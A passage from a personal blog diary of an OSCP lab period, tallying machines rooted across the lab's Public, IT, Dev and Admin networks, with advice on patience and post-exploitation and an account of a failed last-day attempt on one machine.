The post-operation requires a lot of time to be done well, I saw many people in the forum discussions who complained about compromising XX machines but could not get especially machines that are dependent on others that they compromised.. But from that moment on, you don’t know where you missed the information, are you going to waste your time doing post-exploitation everywhere? No, of course not, you ask for help in the forums ;) So do your post-operation properly, take the time, it’s really important and it will open the doors of many machines to you. My average time spent in post-exploitation is 1h30/2h, I had spent 10 hours on one of them, it was one of my first, and it was a critical machine.. I have learned tons of, which is also why I can do post-exploitation more quickly now while being confident that I will do it well..

I heard the pwn is a simple buffer overflow, easy as f**k. I’m not the guy who’s confident about it. Moreover, even if sometimes it’s just that, you’ll find that the complexity is in the context, and you’ll still have to fight to get it. It is a question of methodology, effort, patience, effort. In other words, methodology, enumerate, enumerate, enumerate, enumeratererun, think about a plan, no it won’t work, no, no, no, no, no, no, no, no, no, 0x9090909090, enumerate, 0x909090909090, rest, enumerate, enumerate, enumerate, win.

I’m 26 days after the beginning, I know I’m much better than I was 26 days ago, but I don’t know if I could go to the exam (October 6 at 3am), but I’m going to try hard again as usual, and yes trust me, I know the meaning of these words!

Day 28

On August 25, 4 root access since yesterday, found some changes, but I also discovered the DEV network! So now a small update of the accounts:

Public:

  • 44 machines discovered ;

  • 1 of it isn’t intended to be vulnerable, it’s the firewall which links to the other networks ;

  • 3 are duplicated since they are popular ;

  • As a result => 40 machines, differents, intended to be compromised ;

  • Root 36 out of 40 ;

  • Remains 4 machines (Sufferance included, the last of the big 5 => Humble, Pain, Sufferance, Gh0st, FC4).

IT :

  • 11 machines discovered ;

  • 1 of it isn’t intended to be vulnerable, the firewall again ;

  • 5 machines have an interface linked to the public network, compromised in public ;

  • As a result => 5 machines, differents, intended to be compromised ;

  • Root 2 out of 5, one of the remaining leads to the admin network (I’ve accessed to, but the machine’s role is really weird and have no starting point to compromise it) ;

  • Remains 3 sur 5.

Dev :

  • 7 machines discovered ;

  • 1 of it isn’t intended to be vulnerable, again, firewall ;

  • 1 machine has a link to the IT network (that I’ve compromised at least..) ;

  • As a result => 5 machines, differents, intended to be compromised ;

  • Root 1 out of 5 ;

  • Remains 4 out of 5.

Admin :

  • 5 machines discovered ;

  • Officially there are 4 machines, in fact I found out another one, but since I’m not sure about its role, I’m not stating about it, doesn’t show any open ports despite all my attemps, referenced as DNS server from all the 4 machines ;

  • As a result => I’m going to suppose that there are 4 machines, differents, intended to be compromised ;

  • Root 3 out of 4 ;

  • Remains 1 out of 4.

Total :

  • 67 machines discovered ;

  • 4 machines aren’t intended to be vulnerable ;

  • 9 are or considered duplicated ;

  • As a result => 54 machines, differents, intended to be compromised in Public/Dev/IT/Admin ;

  • Root 42 out of 54 ;

  • Remains 12 machines in Public/Dev/IT/Admin ;

  • 2 days remaining.

Day 29

August 26, today, I almost compromised a machine that wasn’t supposed to be.. but the main achievement of the day is that I finished Jack and that means I compromised the entire administration network!

Day 30

August 27, it’s my last day, I unlocked all the networks, finished the Admin’s one, got Humble, Pain, Gh0st, FC4.. But I still miss Sufferance.. I’ll do my best on this one to get it :)

Sufferance is still not falling.. 1h30 before the end, I’m bruteforcing my way in, I really think it’s the right way, but I don’t know if I’m betting on the right horse.. I won’t have time to try again, this solution seems to me the most legitimate.. So we’ll see, if I get an access then I’ll need to get the root shell very quickly! Unfortunately, I couldn’t get in, I had to bet on the wrong horse!

I salute the courage of the survivors!

I also had the opportunity to do a talk about the OSCP :)

OSCP - Say goodbye to everyone you've ever met

Sadly, I spoke french, you can still get the presentation in PDF here:

PDF

OSCP useful resources and tools